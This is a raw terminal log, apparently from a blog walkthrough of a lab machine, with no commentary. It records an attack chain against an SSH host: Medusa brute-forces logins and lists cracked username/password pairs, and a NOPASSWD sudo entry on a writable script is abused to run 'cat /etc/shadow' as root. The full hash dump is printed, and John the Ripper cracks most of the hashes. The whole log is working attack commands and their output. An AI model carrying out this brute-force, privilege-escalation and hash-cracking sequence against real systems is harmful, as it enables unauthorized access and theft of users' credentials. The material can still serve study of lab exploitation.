ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jbresnahan (25 of 49, 24 complete) Password: Password
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jbresnahan Password: Password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jdavenport (26 of 49, 25 complete) Password: babyl0n
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jdavenport Password: babyl0n [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jduff (27 of 49, 26 complete) Password: trustno1 (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jduff Password: trustno1 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jfranklin (28 of 49, 27 complete) Password: password
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jfranklin Password: password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kclemons (29 of 49, 28 complete) Password: killer (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kclemons Password: killer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: krenfro (30 of 49, 29 complete) Password: gizmodo (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: krenfro Password: gizmodo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ktso (31 of 49, 30 complete) Password: computer (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ktso Password: computer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kwebber (32 of 49, 31 complete) Password: lifehack (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kwebber Password: lifehack [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmartinez (33 of 49, 32 complete) Password: michelle
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmartinez Password: michelle [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmorales (34 of 49, 33 complete) Password: master (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmorales Password: master [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mbryan (35 of 49, 34 complete) Password: pepper (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mbryan Password: pepper [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mholland (36 of 49, 35 complete) Password: baseball
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mholland Password: baseball [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mnader (37 of 49, 36 complete) Password: soccer (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mnader Password: soccer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mrodriguez (38 of 49, 37 complete) Password: jordan
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mrodriguez Password: jordan [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: myajima (39 of 49, 38 complete) Password: 12345 (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: myajima Password: 12345 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: qpowers (40 of 49, 39 complete) Password: 12345678 (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: qpowers Password: 12345678 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rdominguez (41 of 49, 40 complete) Password: gawker
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rdominguez Password: gawker [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rjacobson (42 of 49, 41 complete) Password: internet
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rjacobson Password: internet [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rpatel (43 of 49, 42 complete) Password: 0 (1 of 1
complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rpatel Password: 0 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sgains (44 of 49, 43 complete) Password: batman (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sgains Password: batman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sjohnson (45 of 49, 44 complete) Password: football
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sjohnson Password: football [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: strammel (46 of 49, 45 complete) Password: dragon (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: strammel Password: dragon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: swarren (47 of 49, 46 complete) Password: shadow (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: swarren Password: shadow [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tdeleon (48 of 49, 47 complete) Password: qwerty (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tdeleon Password: qwerty [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tgoodchap (49 of 49, 48 complete) Password: letmein
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tgoodchap Password: letmein [SUCCESS]
GENERAL: Medusa has finished.
root@kali:~# ssh aadams@192.168.1.120
aadams@192.168.1.120's password:
Linux 2.6.27.27.
aadams@slax:~$
aadams@slax:~$ uname -a
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel
GNU/Linux
aadams@slax:~$ id
uid=1005(aadams) gid=100(users) groups=100(users)
aadams@slax:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Sorry, user aadams may not run sudo on slax.
aadams@slax:~$
aadams@slax:~$ cat /etc/group
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root
video:x:18:root
cdrom:x:19:root
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
tape:x:26:root
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root
power:x:84:
pop:x:90:pop
scanner:x:93:
nobody:x:98:nobody
nogroup:x:99:
users:x:100:ccoffee
console:x:101:
admin:x:102:ccoffee
root@kali:~# ssh ccoffee@192.168.1.120
ccoffee@192.168.1.120's password:
Linux 2.6.27.27.
ccoffee@slax:~$
ccoffee@slax:~$ ls -al
total 12
drwx------ 3 ccoffee users 120 Jan 13 10:20 ./
dr-xr-xr-x 53 root root 1040 Jan 13 10:20 ../
-rwx------ 1 ccoffee users 3729 Jan 13 10:20 .screenrc*
-rwx------ 1 ccoffee users 779 Jan 13 10:20 .xsession*
-rwx------ 1 ccoffee users 57 Jan 13 10:20 DONOTFORGET*
drwx------ 2 ccoffee users 60 Jan 13 10:20 scripts/
ccoffee@slax:~$ ls -al scripts/
total 4
drwx------ 2 ccoffee users 60 Jan 13 10:20 ./
drwx------ 3 ccoffee users 120 Jan 13 10:20 ../
-rws--x--x 1 root admin 110 Jan 13 10:20 getlogs.sh*
ccoffee@slax:~$ cat scripts/getlogs.sh
cat: scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo cat scripts/getlogs.sh
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Sorry, user ccoffee is not allowed to execute '/usr/bin/cat scripts/getlogs.sh' as root on slax.
ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
(root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh
ccoffee@slax:~$ /home/ccoffee/scripts/getlogs.sh
/bin/bash: /home/ccoffee/scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo /home/ccoffee/scripts/getlogs.sh
wrong!
ccoffee@slax:~$ cd scripts
ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ vi getlogs.sh
#!/bin/bash
whoami
id
cat /etc/shadow
ccoffee@slax:~/scripts$ chmod 744 getlogs.sh
ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18
(video),19(cdrom),26(tape),83(plugdev)
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
qpowers:$1$eob/a4xo$fPoSwbgY22gWL8qyDU/.I.:16083:0:99999:7:::
mbryan:$1$tmf/f4xo$awoQgL2oPSZMX2lM12Uln1:16083:0:99999:7:::
dgrant:$1$OCh/k4xo$JDbEKsV06nre8zZPrRUvo/:16083:0:99999:7:::
dgilfillan:$1$8hi/p4xo$bWC1IcRe1crQa3s3miuL20:16083:0:99999:7:::
jbresnahan:$1$2Xk/u4xo$mjNw/vkqgdGQTIeYGK8nZ.:16083:0:99999:7:::
aadams:$1$Ttl/z4xo$UZgXCB9PGAEWTrzVJVp3K/:16083:0:99999:7:::
aweiland:$1$sQn/25xo$9y6kbW.j6RQnVz2HMP2141:16083:0:99999:7:::
cchisholm:$1$5to/75xo$6YN0xmN17AsQPldEBdPMC.:16083:0:99999:7:::
jfranklin:$1$DIq/C5xo$WmJvdtiujSkcO1/f2hr8s/:16083:0:99999:7:::
hlovell:$1$Rkr/H5xo$zu11N6JklFJOUxyb1tXTA0:16083:0:99999:7:::
bphillips:$1$eAt/M5xo$iTE1y4NzYBURlA/uLHkdb1:16083:0:99999:7:::
myajima:$1$LXu/R5xo$jLAlFMb.ocYtzQT3O02Mi.:16083:0:99999:7:::
jalcantar:$1$.Aw/W5xo$kvbWzSN38YbHd.fmsPKPh1:16083:0:99999:7:::
jayala:$1$ecx/b5xo$.n631jVFY7Brc2/mmtTJy0:16083:0:99999:7:::
aard:$1$N8z/g5xo$nvfHME6ROtq92qj9RLPFc0:16083:0:99999:7:::
aharp:$1$gd.0l5xo$1rN6r2UE6ssSQI091mcCa1:16083:0:99999:7:::
lmorales:$1$k/00q5xo$S0R/p4g1IsMwpK8Oh.J34.:16083:0:99999:7:::
kclemons:$1$xc10v5xo$CkntJIYKf2uD0wkiJ2HC00:16083:0:99999:7:::
tgoodchap:$1$y/30.6xo$PocUVCFGi9zAM3osucjfl1:16083:0:99999:7:::
tdeleon:$1$Yf4036xo$D/.NeIj324zQsz/UYQsPd0:16083:0:99999:7:::
krenfro:$1$rC6086xo$lZeDnadKgbe26e4C7Yh641:16083:0:99999:7:::
bbanter:$1$yb70D6xo$iZxi1cgaS/uLhmqhEv23Y0:16083:0:99999:7:::
aspears:$1$q790I6xo$hkQF4V5lQGAnzQwlr/Lvk0:16083:0:99999:7:::
djohnson:$1$cSA0N6xo$W62.B.xUGGpa/m.HpXD5w0:16083:0:99999:7:::
aheflin:$1$R4C0S6xo$qt/DDWtf7yneePutW7TW7.:16083:0:99999:7:::
jdavenport:$1$egt0a8xo$Lws.tBjdDpD.znXdUmj8H1:16083:0:99999:7:::
sgains:$1$tyE0c6xo$Q52MI4/PcHRpgUPaoy8UH.:16083:0:99999:7:::
swarren:$1$uTG0h6xo$EhiWJ6pmGy7QjrPg6cPcn.:16083:0:99999:7:::
rdominguez:$1$btH0m6xo$sPSjaDORJ7pbgflVMitKW.:16083:0:99999:7:::
ktso:$1$fQJ0r6xo$gpc5PjEw/l4VMBI.VhXnP/:16083:0:99999:7:::
amaynard:$1$NqK0w6xo$jXNsulUt9dqAZ4QRbc9oC1:16083:0:99999:7:::
lmartinez:$1$nNM0/7xo$7vOUEgfCSw0hGuGuprMRO1:16083:0:99999:7:::
dwestling:$1$coN047xo$8OuVbRrIUfs3EEPnq4bkI0:16083:0:99999:7:::
dtraylor:$1$SHP097xo$FSYeULOeFe2GuqoRTN/6r1:16083:0:99999:7:::
jalvarez:$1$JnQ0E7xo$tniBSw30ynprzjZUhuGUw0:16083:0:99999:7:::
mrodriguez:$1$JMS0J7xo$Qx1XpV6Yic0pmkuiZ.Txd/:16083:0:99999:7:::
rjacobson:$1$MxT0O7xo$QCmvDFxusxS9kxc4r./121:16083:0:99999:7:::
dcooper:$1$rhV0T7xo$28uQIQes7LxuYP3cOOwkE.:16083:0:99999:7:::
mholland:$1$m9X0Y7xo$vs7fehRv9EsaPuA.1Kmem1:16083:0:99999:7:::
aallen:$1$fnY0d7xo$aotMzNPT380HaEKgBB2Fd0:16083:0:99999:7:::
ccoffee:$1$XTa0i7xo$iji75/uqgm4yjzEjhCogr/:16083:0:99999:7:::
sjohnson:$1$e8c0n7xo$56pZc850Z/jVyfytGmBoX0:16083:0:99999:7:::
bwatkins:$1$Tjd0s7xo$8cabV.U80eIG6e7QfwAoN.:16083:0:99999:7:::
kwebber:$1$Dbf0x7xo$yErk7QzGlwUicnNXAI5S91:16083:0:99999:7:::
rpatel:$1$gEh008xo$Vf9/sa3I8y.ZAVVyvmIwU.:16083:0:99999:7:::
jduff:$1$Lki058xo$FaxE0BYi59/Brd/S0MKxT.:16083:0:99999:7:::
mnader:$1$tKk0A8xo$RqOuKq1VLQUaLhjxLV4yL/:16083:0:99999:7:::
strammel:$1$pyl0F8xo$8iJPFq2KWil4NBRKARDTu1:16083:0:99999:7:::
dstevens:$1$CQn0K8xo$4lawd8BU2mdjLfxm2N1WM0:16083:0:99999:7:::
root@kali:~# john shadow1
Loaded 50 password hashes with 50 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
qwerty (tdeleon)
12345 (myajima)
password (jfranklin)
123456 (amaynard)
computer (ktso)
12345678 (qpowers)
abc123 (dgilfillan)
internet (rjacobson)
shadow (swarren)
baseball (mholland)
letmein (tgoodchap)
michael (jayala)
dragon (strammel)
michelle (lmartinez)
jordan (mrodriguez)
trustno1 (jduff)
soccer (mnader)
football (sjohnson)
batman (sgains)
iloveyou (bbanter)
pepper (mbryan)
jennifer (dstevens)
master (lmorales)
monkey (aspears)
sunshine (bphillips)
whatever (aadams)
welcome (hlovell)
111111 (djohnson)
666666 (jalvarez)
654321 (aheflin)
killer (kclemons)
princess (ccoffee)
superman (bwatkins)
123123 (aweiland)
1234567 (cchisholm)
cheese (dgrant)
starwars (dtraylor)
Password (jbresnahan)
nintendo (aallen)
passw0rd (aharp)
blahblah (dwestling)
pokemon (jalcantar)
0 (rpatel)
guesses: 43 time: 0:00:01:34 0.00% (3) c/s: 29442 trying: markey10 - marketio
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
root@kali:~# cat shadow2
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/darkc0de.lst
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0 time: 0:00:00:50 DONE (Mon Jan 13 13:22:46 2014) c/s: 29222 trying: �migr� - �f
root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0 time: 0:00:08:10 DONE (Mon Jan 13 13:32:19 2014) c/s: 29211 trying: 123d - * 7¡Vamos!
That's all.
Nincsenek megjegyzések:
Megjegyzés küldése
Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.